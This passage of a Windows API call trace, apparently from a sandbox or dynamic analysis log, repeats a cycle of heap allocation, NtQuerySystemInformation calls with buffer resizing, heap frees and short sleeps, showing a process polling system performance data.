Flags=0x0, Size=0x30) returned 0x295d5c8 [0295.559] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0295.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0295.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0295.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0295.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0295.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0295.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0295.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.562] Sleep (dwMilliseconds=0x110) [0295.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0295.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0295.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0295.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0295.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0295.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0295.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0295.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0295.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.582] Sleep (dwMilliseconds=0x110) [0295.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0295.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0295.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0295.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0295.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0295.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0295.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0295.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0295.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.612] Sleep (dwMilliseconds=0x110) [0295.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0295.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0295.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0295.631] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0295.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0295.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0295.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0295.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0295.633] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.633] Sleep (dwMilliseconds=0x110) [0295.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0295.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0295.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0295.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0295.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0295.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0295.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0295.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0295.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.672] Sleep (dwMilliseconds=0x110) [0295.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0295.695] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.699] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0295.699] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0295.699] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.699] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0295.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0295.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.700] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0295.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0295.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0295.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.701] Sleep (dwMilliseconds=0x110) [0295.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0295.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0295.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0295.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0295.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0295.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0295.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0295.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0295.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.723] Sleep (dwMilliseconds=0x110) [0295.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0295.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0295.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0295.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0295.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0295.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0295.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0295.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0295.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.738] Sleep (dwMilliseconds=0x110) [0295.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0295.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0295.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0295.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0295.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0295.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0295.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0295.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0295.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.754] Sleep (dwMilliseconds=0x110) [0295.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0295.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0295.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0295.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0295.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0295.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0295.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0295.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0295.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.768] Sleep (dwMilliseconds=0x110) [0295.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0295.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0295.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0295.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0295.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0295.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0295.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0295.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0295.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.785] Sleep (dwMilliseconds=0x110) [0295.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0295.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0295.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0295.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0295.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0295.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0295.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0295.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0295.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.798] Sleep (dwMilliseconds=0x110) [0295.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0295.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0295.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0295.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0295.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0295.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0295.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0295.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0295.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.814] Sleep (dwMilliseconds=0x110) [0295.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0295.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0295.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0295.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0295.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0295.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0295.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0295.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0295.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.830] HeapFree 